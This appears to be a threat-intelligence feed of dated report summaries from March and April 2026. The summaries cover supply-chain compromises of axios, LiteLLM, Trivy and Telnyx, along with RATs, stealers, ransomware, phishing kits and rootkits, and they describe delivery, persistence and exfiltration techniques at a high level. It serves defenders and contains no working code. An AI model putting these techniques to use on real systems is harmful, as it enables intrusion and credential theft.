Stranger Strings: Yurei Ransomware Operator Toolkit Exposed
released on 2026-04-01 @ 06:38:57 PM
Active since September 2025, Yurei is a double extortion ransomware campaign. The operators run their own Tor data leak site with a low number of victims listed at the time of writing. It is reportedly derived from Prince Ransomware, an open-source ransomware family written in Go. Check Point researchers noted that all samples were first submitted to VirusTotal from Morocco, and that one sample did not include a ticket ID, indicating that this could be a test build, possibly uploaded by the developer themselves. Yurei samples also contain a link to SatanLockv2, based on the presence of the PDB path string “D:\satanlockv2” in the samples.
North Korea-Nexus Threat Actor Compromises Widely Used Axios NPM Package in Supply Chain Attack
released on 2026-04-01 @ 01:28:58 PM
Google Threat Intelligence Group (GTIG) is tracking an active software supply chain attack targeting the popular Node Package Manager (NPM) package "axios." Between March 31, 2026, 00:21 and 03:20 UTC, an attacker introduced a malicious dependency named "plain-crypto-js" into axios NPM releases versions 1.14.1 and 0.30.4. Axios is the most popular JavaScript library used to simplify HTTP requests, and these packages typically have over 100 million and 83 million weekly downloads, respectively. This malicious dependency is an obfuscated dropper that deploys the WAVESHAPER.V2 backdoor across Windows, macOS, and Linux.
Unpacking Augmented Marauder’s Multi-Pronged Casbaneiro Campaigns
released on 2026-04-01 @ 01:27:03 PM
BlueVoyant researchers have uncovered a broad, multi-pronged phishing campaign targeting Spanish-speaking users in organizations across Latin America and now Europe as well. While recent industry intelligence heavily documented attacks utilizing WhatsApp to deliver banking trojans under the umbrella of the Brazil-based eCrime group Augmented Marauder (a.k.a. Water Saci)
Inside the Axios supply chain compromise - one RAT to rule them all
released on 2026-04-01 @ 01:22:55 PM
Elastic Security Labs identified a supply chain compromise of the axios npm package, one of the most depended-upon packages in the JavaScript ecosystem with approximately 100 million weekly downloads. The attacker compromised a maintainer account and published backdoored versions that delivered a cross-platform Remote Access Trojan to macOS, Windows, and Linux systems through a malicious postinstall hook.
Latest Xloader Obfuscation Methods and Network Protocol
released on 2026-04-01 @ 01:17:44 PM
Xloader is an information stealing malware family that evolved from Formbook and targets web browsers, email clients, and File Transfer Protocol (FTP) applications. Additionally, Xloader may execute arbitrary commands and download second-stage payloads on an infected system. The author of Xloader continues to update the codebase, with the most recent observed version being 8.7. Since version 8.1, the Xloader developer applied several changes to the code obfuscation. The purpose of this blog is to describe the latest obfuscation methods and provide an in-depth analysis of the network communication protocol. We highly recommend reading our previous blogs about Xloader in order to get a better understanding of the malware’s internals.
From Inbox to Intrusion: Multi-Stage Remcos RAT and C2-Delivered Payloads in Network
released on 2026-04-01 @ 01:16:57 PM
This multi-stage fileless Remcos RAT attack leverages a phishing-delivered JavaScript dropper to trigger a reflective PowerShell loader that executes payloads entirely in memory. The infection chain utilizes obfuscation techniques like rotational XOR and Base64 encoding to reconstruct .NET payloads, significantly reducing the disk-based detection footprint. Stealth is maintained by using aspnet_compiler.exe as a LOLBin to proxy malicious execution and dynamically retrieving the final payload from a remote C2 server.
Axios Front-End Library npm Supply Chain Poisoning Alert
released on 2026-04-01 @ 01:16:22 PM
On March 31, NSFOCUS CERT detected a supply chain poisoning of the npm package of the HTTP client library Axios. The attacker bypassed the project's normal GitHub Actions CI/CD pipeline, changed the account email address of the axios maintainer to an anonymous ProtonMail address, and manually published a malicious version containing a Trojan backdoor through the npm CLI. Once a user installs it, persistent remote control of the host is established. The impact is wide-ranging, and affected users are urged to investigate and apply protective measures as soon as possible.
A laughing RAT: CrystalX combines spyware, stealer, and prankware features
released on 2026-04-01 @ 06:24:47 AM
In March 2026, a new MaaS active campaign was discovered promoting previously unknown malware in private Telegram chats. The Trojan features an extensive arsenal of capabilities. On the panel provided to third-party actors, in addition to the standard features of RAT-like malware, a stealer, keylogger, clipper, and spyware are also available.
Weaponizing the Protectors: TeamPCP's Multi-Stage Supply Chain Attack on Security Infrastructure
released on 2026-04-01 @ 02:05:28 AM
Between late February and March 2026, threat group TeamPCP conducted a highly calculated, escalating sequence of supply chain threats. It systematically compromised widely trusted open-source security tools, including the vulnerability scanners Trivy and KICS and the popular AI gateway LiteLLM. The affected software also includes the official Python SDK of Telnyx.
Operation TrueChaos: 0-Day Exploitation Against Southeast Asian Government Targets
released on 2026-03-31 @ 04:35:38 PM
A zero-day vulnerability in the TrueConf client application, CVE-2026-3502, was exploited in a targeted campaign against government entities in Southeast Asia. The flaw allows attackers controlling an on-premises TrueConf server to distribute and execute arbitrary files across connected endpoints. The campaign, dubbed 'TrueChaos', abused the trusted update channel to deliver malware to multiple government agencies. The attack likely involved a Chinese-nexus threat actor and utilized the Havoc post-exploitation framework. The vulnerability stems from inadequate validation in the update process, enabling malicious updates to be distributed through a centrally managed server. TrueConf has since released a fix in version 8.5.3 of their Windows client.
WhatsApp malware campaign delivers VBScript and MSI backdoors
released on 2026-03-31 @ 04:35:37 PM
A sophisticated malware campaign targeting WhatsApp users has been observed since February 2026. The attack chain begins with malicious Visual Basic Script files sent via WhatsApp messages, which, when executed, initiate a multi-stage infection process. The malware uses renamed Windows utilities, retrieves payloads from trusted cloud services, and installs malicious MSI packages. The campaign employs social engineering, stealth techniques, and cloud-based payload hosting to establish persistence and escalate privileges on victim systems. The attackers utilize legitimate tools and trusted platforms to reduce visibility and increase the likelihood of successful execution. The final stage involves the delivery of unsigned MSI installers that enable remote access to compromised systems.
Supply-Chain Compromise of axios npm Package
released on 2026-03-31 @ 04:35:35 PM
A coordinated supply chain attack targeted the axios npm package, compromising two versions (1.14.1 and 0.30.4) by injecting a malicious dependency. The attack delivered a cross-platform Remote Access Trojan to macOS, Windows, and Linux systems. The compromise occurred through the lead maintainer's npm account, bypassing normal publishing workflows. The malicious payload performed system reconnaissance, established persistence on Windows, and provided remote access capabilities. The attack affected numerous organizations and potentially exposed sensitive credentials. Immediate mitigation steps include pinning to safe versions, removing malicious dependencies, rotating credentials, and blocking the command and control server.
New widespread EvilTokens kit: device code phishing as-a-service
released on 2026-03-31 @ 04:14:30 PM
EvilTokens is a new Phishing-as-a-Service offering a turnkey Microsoft device code phishing kit. It enables attackers to harvest access and refresh tokens, granting unauthorized access to victims' Microsoft accounts. The kit supports post-compromise operations, allowing data exfiltration from various Microsoft services. EvilTokens has been rapidly adopted by cybercriminals since March 2026, impacting organizations globally. The service provides advanced capabilities for account takeover, including token conversion to Primary Refresh Tokens and browser cookies for persistent access. Phishing campaigns using EvilTokens target employees in finance, HR, logistics, and sales, primarily for Business Email Compromise attacks.
CrySome RAT: An Advanced Persistent .NET Remote Access Trojan
released on 2026-03-31 @ 04:14:29 PM
CrySome is a sophisticated .NET-based remote access trojan designed for persistent command-and-control operations. It features advanced persistence mechanisms, including recovery partition abuse and offline registry modification, allowing it to survive system resets. The malware incorporates an aggressive defense evasion module, disabling security products and blocking updates. Key capabilities include command execution, file operations, surveillance, credential theft, and hidden virtual desktop control. CrySome's modular architecture and structured packet-based protocol enable a wide range of remote operations. Its emphasis on stealth, resilience, and comprehensive system control makes it a significant threat for long-term covert access to compromised environments.
Phantom Footprints: Tracking GhostSocks Malware
released on 2026-03-31 @ 04:14:29 PM
GhostSocks is an emerging threat that turns compromised devices into residential proxy nodes, enabling attackers to evade detection. Originally marketed on Russian underground forums as Malware-as-a-Service, it has gained popularity due to its partnership with Lumma Stealer. Written in GoLang, GhostSocks uses SOCKS5 proxy protocol and TLS encryption to blend malicious traffic into normal network activity. It also incorporates backdoor functionality for running arbitrary commands and deploying additional payloads. Darktrace observed an increase in GhostSocks activity, detecting it alongside Lumma Stealer in customer networks. The malware's versatility in converting devices into proxy nodes while enabling covert network access illustrates how threat actors maximize the value of compromised infrastructure.
One Click Away: Inside a LinkedIn Phishing Attack
released on 2026-03-31 @ 04:14:21 PM
A sophisticated phishing campaign targeting LinkedIn users has been identified. The attack uses fake LinkedIn message notifications to lure victims into clicking on malicious links. The emails closely mimic legitimate LinkedIn communications, including spoofed display names and formatting. Upon clicking, users are redirected to a convincing but fraudulent LinkedIn login page designed to steal credentials. The phishing page uses a deceptive domain name similar to 'LinkedIn' to further trick users. This campaign demonstrates the evolving tactics of cybercriminals in exploiting human trust and curiosity. The analysis emphasizes the importance of vigilance, source verification, and caution when interacting with seemingly routine notifications.
Axios NPM Distribution Compromised in Supply Chain Attack
released on 2026-03-31 @ 11:56:06 AM
An unknown threat actor compromised the npm account of an axios maintainer, publishing two malicious versions of the package. These versions introduced a dependency on plain-crypto-js, a newly created malicious package. Despite quick removal, axios's widespread usage led to rapid exposure. The malicious package includes a dropper that downloads and executes platform-specific second-stage payloads, functioning as remote access trojans. These payloads can execute remote shells, inject binaries, browse directories, list processes, and perform system reconnaissance. Organizations are advised to audit their environments, remove malicious artifacts, rotate exposed credentials, investigate potential compromise paths, and monitor for suspicious activity.
Operation DualScript: Multi-Stage PowerShell Malware Targets Crypto
released on 2026-03-31 @ 07:10:02 AM
Operation DualScript is a sophisticated multi-stage malware campaign targeting cryptocurrency and financial activities. It utilizes Windows Scheduled Tasks, VBScript launchers, and PowerShell execution to maintain persistence while minimizing disk artifacts. The attack operates through two parallel chains: a web-based PowerShell loader deploying a cryptocurrency clipboard hijacker, and a secondary chain executing the RetroRAT implant in memory. RetroRAT monitors user activity, captures keystrokes, and tracks interactions with financial services to harvest sensitive information. The malware employs various anti-analysis techniques and establishes a command-and-control channel for remote access and data exfiltration. This campaign highlights the growing abuse of trusted system utilities and in-memory execution techniques to evade traditional detection mechanisms.
TeamPCP’s Telnyx Attack Marks a Shift in Tactics Beyond LiteLLM
released on 2026-03-30 @ 06:06:15 PM
TeamPCP launched a sophisticated attack on the Telnyx Python SDK, publishing malicious versions 4.87.1 and 4.87.2 to PyPI. The attack represents an evolution from their previous LiteLLM campaign, incorporating WAV-based steganography, split-file code injection, and expanded platform support. The payload, activated on import, uses stealthy techniques to download and execute credential-stealing malware across Linux, macOS, and Windows systems. Key changes include the use of audio steganography to hide malicious code, improved evasion through split-file injection, and the addition of Windows support with Startup folder persistence. The attackers shifted from HTTPS to plaintext HTTP infrastructure, potentially exposing their activities to network monitoring. Organizations are advised to downgrade to the last clean version and treat affected systems as compromised.
Security brief: tax scams aim to steal funds from taxpayers
released on 2026-03-30 @ 09:16:31 AM
Threat actors are exploiting tax season with numerous campaigns leveraging tax themes to deliver malware, remote monitoring tools, fraud attempts, and credential phishing. Over a hundred campaigns have been observed in 2026, with a notable increase in remote monitoring and management (RMM) payloads. Tactics include impersonating tax agencies, claiming expired documents, and requesting tax filing support. While primarily targeting the United States, campaigns have also been observed in Canada, Australia, Switzerland, and Japan. Notable actors include TA4922, a newly designated threat group delivering malware from the Winos4.0 ecosystem, and TA2730, focusing on credential phishing for financial institutions. Business email compromise actors are also using tax form lures to steal financial and personal data. These campaigns demonstrate the ongoing exploitation of timely and topical themes by cybercriminals to deceive users.
A cunning predator: How Silver Fox preys on Japanese firms this tax season
released on 2026-03-28 @ 04:12:51 PM
Silver Fox, a threat actor, is exploiting Japan's tax filing and organizational change season with a targeted spearphishing campaign against Japanese businesses. The group sends convincing phishing emails related to tax compliance, salary adjustments, and HR matters, tricking recipients into opening malicious links or attachments. The campaign capitalizes on the high volume of legitimate financial and HR communications during this period, increasing the risk of compromise. Silver Fox has expanded its targets from Chinese-speaking entities to Southeast Asia, Japan, and potentially North America. The group uses ValleyRAT, a remote access trojan, to gain control of compromised machines and steal sensitive information. To protect against this threat, organizations should increase vigilance, reinforce awareness about phishing attempts, and verify the authenticity of tax- and HR-themed requests.
Telnyx Python SDK Compromised to Deliver Credential-Stealing Malware
released on 2026-03-28 @ 07:39:59 AM
A supply chain attack affecting the telnyx Python package on PyPI has been identified. Malicious versions 4.87.1 and 4.87.2 contained embedded credential-harvesting malware. The attack employs a three-stage runtime chain on Linux/macOS using audio steganography for delivery, in-memory execution of a data harvester, and encrypted exfiltration. On Windows, it drops a persistent binary in the Startup folder. The malware uses sophisticated techniques including fileless execution, hybrid encryption, and anti-forensics measures. The threat actor, TeamPCP, demonstrates high operational security and cryptographic awareness. Developers are advised to audit environments, rotate credentials, and check for indicators of compromise.
BreachForums Data Leaks: Technical Analysis and Timeline Attribution (2022–2026)
released on 2026-03-28 @ 07:39:57 AM
This analysis examines multiple data leaks attributed to BreachForums between 2022 and 2026, focusing on distinguishing between leak publication dates and actual data timelines. The study covers four datasets associated with different domain names (.vc, .co, .hn, .bf) used by the platform. Each dataset is analyzed based on publication date, format, database structure, and the 'lastactive' field in the user table. The analysis reveals that the domain associated with a leak does not necessarily indicate the timing of the compromise, but rather the context of data collection. The article emphasizes the importance of differentiating between publication date and actual data timeline to avoid misattribution in cyber threat intelligence activities.
AI Infrastructure Supply Chain Poisoning Alert
released on 2026-03-27 @ 06:59:54 PM
A supply chain poisoning attack on LiteLLM, a popular AI model gateway, was detected by NSFOCUS Technology CERT. The TeamPCP group compromised the Trivy security scanning tool used in LiteLLM's release process, allowing them to publish malicious versions 1.82.7 and 1.82.8 on PyPI. These versions contained credential-stealing programs that collected sensitive data and, if a Kubernetes cluster was detected, deployed privileged Pods and implanted persistent backdoors. The attack impacted numerous dependent packages and potentially affected millions of users. The incident highlights the growing risks in AI infrastructure and the need for robust supply chain security measures.
AitM Phishing Targets TikTok Business Accounts Using Cloudflare Turnstile Evasion
released on 2026-03-27 @ 06:58:15 PM
A new phishing campaign is targeting TikTok for Business accounts using adversary-in-the-middle (AitM) techniques. The attackers employ Cloudflare Turnstile to evade detection and create convincing lookalike pages impersonating TikTok for Business or Google Careers. Victims are tricked into clicking malicious links, leading to credential theft. The campaign aims to seize control of business accounts, which can be used for malvertising and malware distribution. Multiple domains are involved in hosting the phishing pages. Additionally, a separate campaign using SVG file attachments to deliver malware has been observed in Venezuela, with potential links to BianLian ransomware activity.
Infiniti Stealer: a new macOS infostealer using ClickFix and Python/Nuitka
released on 2026-03-27 @ 09:42:41 AM
A new macOS infostealer called Infiniti Stealer has been discovered, utilizing ClickFix delivery and Python/Nuitka compilation. The malware spreads through a fake CAPTCHA page, tricking users into running a command themselves. The final payload is a Python-based stealer compiled with Nuitka, making it harder to analyze and detect. The malware targets sensitive data including browser credentials, macOS Keychain entries, cryptocurrency wallets, and developer files. It employs anti-analysis techniques and exfiltrates data via HTTP POST requests. This campaign demonstrates the adaptation of Windows-based techniques to target Mac users and showcases the increasing sophistication of macOS malware.
Inside Keitaro Abuse Part 2: One Platform, Many Threats
released on 2026-03-27 @ 08:46:14 AM
This analysis examines how threat actors abuse Keitaro, an advertising performance tracker, for various malicious purposes. The report covers a wide range of threats, including malware delivery, phishing, scams, and illegal content distribution. Key findings include the use of Keitaro for cloaking and traffic distribution in malvertising campaigns, spam operations leveraging Keitaro for cryptocurrency wallet draining, and the abuse of Keitaro in investment scams. The report also highlights specific threat actors and their tactics, such as domain hijacking for adult content delivery and the use of fake arrests as clickbait for investment scams. Overall, the analysis demonstrates how Keitaro's features make it attractive to cybercriminals seeking to maximize their reach with minimal effort.
BRUSHWORM and BRUSHLOGGER uncovered
released on 2026-03-27 @ 08:45:51 AM
A South Asian financial institution was targeted with two custom malware components: BRUSHWORM, a modular backdoor, and BRUSHLOGGER, a keylogger. BRUSHWORM features anti-analysis checks, encrypted configuration, scheduled task persistence, modular payload downloading, USB worm propagation, and extensive file theft. BRUSHLOGGER uses DLL side-loading to capture system-wide keystrokes with window context tracking. The malware's low sophistication and implementation flaws suggest an inexperienced author, possibly using AI code-generation tools. Multiple testing versions were discovered on VirusTotal, indicating iterative development. The malware components combine to create a functional collection platform with modular loading, USB propagation, broad file theft, air-gap bridging, and persistent keystroke capture.
The Certificate Decoding Illusion: How Blank Grabber Stealer Hides Its Loader
released on 2026-03-27 @ 08:45:50 AM
BlankGrabber, a Python-based information stealer, employs sophisticated techniques to evade detection and exfiltrate sensitive data. It uses a multi-stage infection chain, starting with a batch file loader that disguises the payload as certificate data. The malware implements anti-analysis measures, including sandbox and virtualization checks. It harvests a wide range of data, including browser information, system details, and credentials from various applications. BlankGrabber utilizes Windows Management Instrumentation for system discovery, captures screenshots and webcam images, and attempts to disable Windows Defender. The malware achieves persistence through startup folder manipulation and exfiltrates data using Telegram bots and public web services.
Converging Interests: Analysis of Threat Clusters Targeting a Southeast Asian Government
released on 2026-03-27 @ 02:01:01 AM
Unit 42 researchers uncovered a series of cyberespionage campaigns targeting a Southeast Asian government organization between June and August 2025. Three distinct activity clusters were identified: Stately Taurus, CL-STA-1048, and CL-STA-1049. Stately Taurus used USB-propagated malware to deploy the PUBLOAD backdoor. CL-STA-1048 employed an espionage toolkit including EggStremeFuel backdoor, Masol RAT, and other tools. CL-STA-1049 utilized a novel Hypnosis loader to deploy FluffyGh0st RAT. These clusters show significant overlap with known China-aligned campaigns, suggesting a coordinated effort to establish persistent access and exfiltrate sensitive data from government networks. The convergence of multiple threat actors indicates a complex, well-resourced operation with a common strategic objective.
EtherRAT & SYS_INFO Module: C2 on Ethereum (EtherHiding), Target Selection, CDN-Like Beacons
released on 2026-03-26 @ 09:08:20 PM
EtherRAT, a Node.js-based backdoor linked to a North Korean APT group, was detected in a retail customer's environment. It allows arbitrary command execution, extensive system information gathering, and asset theft. The malware uses 'EtherHiding' to store C2 addresses in Ethereum smart contracts, making infrastructure resilient to takedowns. It communicates using CDN-like beaconing to blend with normal traffic. Initial access varied, including ClickFix and IT Support scams via Microsoft Teams. A SYS_INFO module performs comprehensive host fingerprinting for target selection. The malware checks for CIS languages and self-destructs if found. It collects detailed system information, including hardware, software, and network details.
Pawn Storm Campaign Deploys PRISMEX, Targets Government and Critical Infrastructure Entities
released on 2026-03-26 @ 09:05:00 PM
The Russian-aligned cyber espionage group Pawn Storm has launched a new campaign using the PRISMEX malware suite to target Ukrainian defense and Western military aid infrastructure. The campaign exploits vulnerabilities CVE-2026-21509 and CVE-2026-21513, using advanced steganography, COM hijacking, and cloud service abuse for command and control. PRISMEX components include a dropper, steganography loader, and Covenant Grunt implant. The attacks focus on compromising the Ukrainian defense supply chain, including military allies, meteorological data providers, and transport hubs. The campaign demonstrates Pawn Storm's continued aggression and ability to rapidly weaponize vulnerabilities, posing a significant threat to government and critical infrastructure entities in Central and Eastern Europe.
GlassWorm attack installs fake browser extension for surveillance
released on 2026-03-26 @ 08:45:06 PM
GlassWorm is a sophisticated malware targeting developers through compromised code repositories and package managers. It executes in stages, starting with a stealthy infection that fingerprints the machine and fetches further payloads via the Solana blockchain. The malware steals sensitive data, including cryptocurrency wallets and development credentials, installs a Remote Access Trojan (RAT), and deploys a fake Chrome extension for extensive surveillance. It uses distributed hash tables and blockchain for resilient command and control. While initially focused on developers with potential cryptocurrency assets, the stolen information could enable wider supply chain attacks. Prevention strategies include careful package management, regular extension audits, and up-to-date anti-malware solutions.
The Return of the Kinsing
released on 2026-03-26 @ 05:34:51 PM
A Canary Intelligence team analysis revealed the resurgence of the Kinsing malware, exploiting three CVEs: CVE-2023-46604 (ActiveMQ), CVE-2023-38646 (Metabase), and CVE-2025-55182 (React2Shell). The attacks, originating from IP 212.113.98.30, converged on a shared staging host at 78.153.140.16. The malware's tactics include downloading and installing a Go-based Linux binary and a stealthy libsystem.so component. The exploitation methods involve retrieving and executing malicious scripts, leading to the installation of Kinsing's core components. This cluster of activity demonstrates how older malware families can remain relevant by exploiting new vulnerabilities without significantly changing their core binaries.
Illuminating VoidLink: Technical analysis of the VoidLink rootkit framework
released on 2026-03-26 @ 11:59:44 AM
Elastic Security Labs analyzes VoidLink, a sophisticated Linux malware framework combining Loadable Kernel Modules (LKMs) and eBPF for persistence. The rootkit, developed by a Chinese-speaking threat actor, evolved through four generations, targeting kernels from CentOS 7 to Ubuntu 22.04. VoidLink employs advanced techniques like delayed initialization, runtime key rotation, and a hybrid LKM-eBPF architecture for comprehensive stealth. Notable features include an ICMP-based covert channel, process protection, and memfd-aware boot loading. Evidence suggests AI-assisted development, lowering the barrier for kernel-level rootkit creation. Detection strategies and defensive recommendations are provided to counter this emerging threat.
ClickFix Campaigns Targeting Windows and macOS
released on 2026-03-25 @ 09:48:17 PM
Insikt Group identified five distinct clusters using the ClickFix social engineering technique for initial access. These clusters impersonate various services like Intuit QuickBooks and Booking.com, demonstrating operational variance but similar core techniques. ClickFix manipulates victims into executing malicious commands within native system tools, bypassing traditional security controls. The methodology has become a standardized template for cybercriminals and APT groups. Campaigns target diverse sectors and use sophisticated obfuscation and living-off-the-land tactics. Defenders are advised to implement aggressive behavioral hardening and user awareness training to mitigate these threats.
Supply Chain Attack: Malicious PyPI Packages
released on 2026-03-25 @ 10:38:34 AM
TeamPCP has launched a supply chain attack targeting LiteLLM, an open-source Python library used in 36% of cloud environments. Malicious versions 1.82.7 and 1.82.8 were published on PyPI, employing sophisticated techniques for payload delivery and persistence. The compromised packages exploit Python's .pth mechanism for stealthy execution across any Python process. The malware collects sensitive data including API keys, cloud credentials, and CI/CD secrets, encrypting and exfiltrating them to attacker-controlled domains. This attack follows TeamPCP's previous compromises of Aqua Security's Trivy and Checkmarx tools, highlighting an ongoing campaign against the open-source ecosystem. The incident underscores the potential for widespread impact and the need for vigilance in software supply chain security.
Malicious PyPI Package - LiteLLM Supply Chain Compromise
released on 2026-03-25 @ 10:38:29 AM
A malicious supply chain attack has been discovered in the Python Package Index package litellm version 1.82.8. The compromised package contains a malicious .pth file that executes automatically when the Python interpreter starts, without requiring explicit import. This file, located in site-packages/, exfiltrates sensitive information including environment variables, SSH keys, and cloud credentials to an attacker-controlled server. The payload is double base64-encoded to evade basic static analysis. PyPI administrators have quarantined the project to limit its spread. Users are advised to check for the malicious file, rotate all potentially exposed credentials, and audit their PyPI publishing process. The attack is attributed to TeamPCP and is actively exploited in the wild.
Guidance for detecting, investigating, and defending against the Trivy supply chain compromise
released on 2026-03-25 @ 04:25:05 AM
On March 19, 2026, Trivy, an open-source vulnerability scanner, was compromised in a sophisticated CI/CD supply chain attack. Threat actors, identified as TeamPCP, injected credential-stealing malware into official Trivy releases, affecting the core binary and GitHub Actions. The attack exploited mutable tags and commit identity spoofing on GitHub. The malware performed extensive credential harvesting, targeting cloud providers, Kubernetes secrets, and various application credentials. Microsoft Defender provides detection and investigation capabilities for this threat. Recommended mitigations include updating to safe versions, hardening CI/CD pipelines, enforcing least privilege, protecting secrets, and leveraging attack path analysis to reduce lateral movement risks.
CanisterWorm Gets Teeth: TeamPCP's Kubernetes Wiper Targets Iran
released on 2026-03-24 @ 10:50:58 AM
A new payload in the TeamPCP arsenal has been discovered, capable of wiping entire Kubernetes clusters. The script uses the same ICP canister as the CanisterWorm campaign, with consistent lateral movement via DaemonSets. However, this variant introduces a geopolitically targeted destructive payload aimed specifically at Iranian systems. The malware checks timezone and locale to identify Iranian systems, deploying privileged DaemonSets across every node in Kubernetes environments. Iranian nodes are wiped and force-rebooted, while non-Iranian nodes receive the CanisterWorm backdoor. The latest variant adds network-based lateral movement, exploiting exposed Docker APIs and using SSH for spread. This development shows TeamPCP's ability to operate at supply chain scale and their willingness to engage in destructive actions.
Supply chain compromise spreads from Trivy to Checkmarx GitHub Actions
released on 2026-03-24 @ 08:49:59 AM
A threat actor known as TeamPCP expanded its supply chain attack from Aqua Security's Trivy to Checkmarx's AST GitHub Action. The attack, which began on March 19, 2026, involved injecting a credential-stealing payload into CI/CD pipelines across thousands of repositories. The malicious code harvested secrets from runner memory, queried cloud metadata, and exfiltrated encrypted data to typosquat domains. The Checkmarx compromise occurred approximately four days after the initial Trivy incident, using identical techniques but targeting a different action. This cascading effect demonstrates how compromised actions can be used to harvest credentials and compromise additional dependencies. Runtime detection proved effective in identifying the attack pattern across both waves, as the underlying behavior remained consistent despite changes in the delivery mechanism.
KICS GitHub Action Compromised: TeamPCP Supply Chain Attack
released on 2026-03-24 @ 08:49:53 AM
The KICS GitHub Action, an open-source infrastructure as code security scanner by Checkmarx, was compromised by TeamPCP, the group behind the recent Trivy attack. Between 12:58 and 16:50 UTC on March 23, 35 tags were hijacked, exposing users to credential-stealing malware. The attack involved staging imposter commits and updating tags using a compromised identity. The malware uses a new C2 domain, creates a fallback repository, and adds Kubernetes-focused persistence code. Additionally, two OpenVSX extensions were compromised. The payload targets cloud provider credentials and installs persistence on non-CI systems. Security teams are advised to audit workflows, search for exfiltration artifacts, and implement long-term hardening measures.
Tracing a Multi-Vector Malware Campaign: From VBS to Open Infrastructure
released on 2026-03-24 @ 08:49:51 AM
A multi-stage malware delivery campaign was uncovered, initially detected through a suspicious VBS file. The investigation revealed a complex attack infrastructure using Unicode obfuscation, PNG-based payload staging, and reflectively loaded .NET execution. The attacker utilized open directories to host multiple obfuscated VBS files, each mapping to different malware payloads including XWorm and Remcos RAT. A secondary infection vector involving a weaponized 'PDF' and batch script was also discovered. The campaign demonstrated a modular approach, allowing for payload rotation and multiple attack vectors from the same domain. This sophisticated infrastructure design enables rapid modification and expansion of available payloads without altering the initial delivery mechanism.
Pro-Iranian Nasir Security is Targeting The Energy Sector in the Middle East
released on 2026-03-23 @ 06:36:24 PM
A new cybercriminal group, Nasir Security, believed to be associated with Iran, is targeting energy organizations in the Middle East. They focus on attacking supply chain vendors involved in engineering, safety, and construction. The group emerged in October 2025 and has claimed attacks on various energy sector companies, including Dubai Petroleum, CC Energy Development, and Al-Safi Oil Company. However, their claims are likely exaggerated, and the actual breaches appear to be of third-party contractors. The group's tactics include business email compromise, spear phishing, and exploiting public-facing applications. Their activities are seen as part of a broader Iranian strategy to conduct cyberattacks and spread misinformation during ongoing geopolitical conflicts.
GhostClaw expands beyond npm: GitHub repositories and AI workflows deliver macOS infostealer
released on 2026-03-23 @ 09:27:46 AM
The GhostClaw malware campaign has expanded its distribution methods beyond npm packages to include GitHub repositories and AI-assisted development workflows. The attackers impersonate legitimate tools and utilize multi-stage payloads to steal credentials and retrieve additional malicious code. The infection chain involves executing shell commands, presenting fake authentication prompts, and establishing persistence. The campaign leverages both manual installation through README instructions and automated AI-assisted workflows. Multiple GitHub repositories have been identified, all communicating with a common command-and-control infrastructure. This shift in tactics allows the attackers to target a broader range of victims, including developers and users of AI-assisted coding tools.
Libyan Oil Refinery Among Targets in Long-running Likely Espionage Campaign
released on 2026-03-20 @ 09:15:16 PM
A series of attacks targeting Libyan organizations, including an oil refinery, a telecoms organization, and a state institution, occurred between November 2025 and February 2026. The campaign utilized the AsyncRAT backdoor, delivered through spear-phishing emails with Libya-themed lure documents. The attackers exploited current events, such as the assassination of Saif al-Gaddafi, to gain access to networks. The modular nature of AsyncRAT and the targeted organizations suggest possible state sponsorship. The campaign's focus on Libya and its oil industry is notable, given the country's increased oil production and global energy supply concerns amidst Middle East conflicts.
Widespread GitHub Actions Tag Compromise Exposes CI/CD Secrets
released on 2026-03-20 @ 09:51:35 AM
A new supply chain attack targeting Trivy has compromised 75 out of 76 version tags in the aquasecurity/trivy-action GitHub repository. The attacker force-pushed these tags to serve malicious payloads, effectively turning trusted version references into a distribution mechanism for an infostealer. The malicious code executes within GitHub Actions runners, targeting sensitive data in CI/CD environments. It harvests secrets from runner process memory and the filesystem, encrypts the collected data, and exfiltrates it to an attacker-controlled endpoint or a fallback GitHub-based channel. The attack's scope is significant, potentially affecting over 10,000 workflow files on GitHub referencing this action.
CVE-2026-33017: How attackers compromised Langflow AI pipelines in 20 hours
released on 2026-03-20 @ 09:51:34 AM
A critical vulnerability in Langflow, an open-source visual framework for AI agents and RAG pipelines, was disclosed on March 17, 2026. The vulnerability, CVE-2026-33017, allows unauthenticated remote code execution on exposed Langflow instances. Within 20 hours, exploitation attempts were observed in the wild. Attackers rapidly developed working exploits from the advisory description and began scanning for vulnerable instances. The Sysdig Threat Research Team deployed honeypots to monitor the attacks, observing automated scanning, custom exploit scripts, and data harvesting activities. The rapid exploitation highlights the accelerating trend of shorter time-to-exploit for vulnerabilities, posing significant challenges for defenders. The attackers targeted high-value data, API keys, and potential software supply chain compromise.
VoidStealer: Debugging Chrome to Steal Its Secrets
released on 2026-03-20 @ 09:51:33 AM
VoidStealer is an emerging infostealer that employs a novel debugger-based Application-Bound Encryption (ABE) bypass technique. This method leverages hardware breakpoints to extract the v20_master_key directly from browser memory, requiring neither privilege escalation nor code injection. The technique involves attaching to the browser process as a debugger, setting breakpoints at strategic locations, and extracting the key when it's briefly present in plaintext. This approach offers a lower detection footprint compared to alternative bypass methods. The blog post dissects the technique step-by-step, from locating the target address for breakpoint placement to extracting the key. It also provides detection strategies for defenders, focusing on monitoring debugger attachments and suspicious browser memory reads.
An Overview of The Gentlemen's TTPs
released on 2026-03-20 @ 08:24:50 AM
This intelligence report provides a comprehensive analysis of The Gentlemen, a ransomware group known for its sophisticated tactics, techniques, and procedures (TTPs). The group exploits vulnerabilities in FortiOS/FortiProxy, maintains a database of compromised devices, and employs advanced defense evasion techniques. Their initial access methods include exploiting public-facing applications and brute-force attacks. The Gentlemen utilize various execution, persistence, and privilege escalation techniques, while also focusing on credential access and lateral movement. The group's impact includes data encryption and inhibiting system recovery. The report highlights the group's ongoing efforts to improve their ransomware capabilities by reverse-engineering other malware samples.
Copyright Lures Mask a Multi-Stage PureLog Stealer Attack on Key Industries
released on 2026-03-20 @ 08:13:38 AM
A sophisticated malware campaign delivering PureLog Stealer has been identified, targeting healthcare, government, hospitality, and education sectors in multiple countries. The attack uses localized copyright violation lures to trick victims into executing a multi-stage infection chain. The malware employs encrypted payloads, remote key retrieval, and fileless execution techniques to evade detection. It utilizes a Python-based loader and dual .NET loaders to run PureLog Stealer entirely in memory. The campaign incorporates AMSI bypass, registry persistence, screenshot capture, and victim fingerprinting for stealth and intelligence gathering. Evidence confirms communication with PureLog-associated infrastructure.
Beast Ransomware Toolkit: A Proactive Threat Intelligence Report
released on 2026-03-20 @ 08:12:00 AM
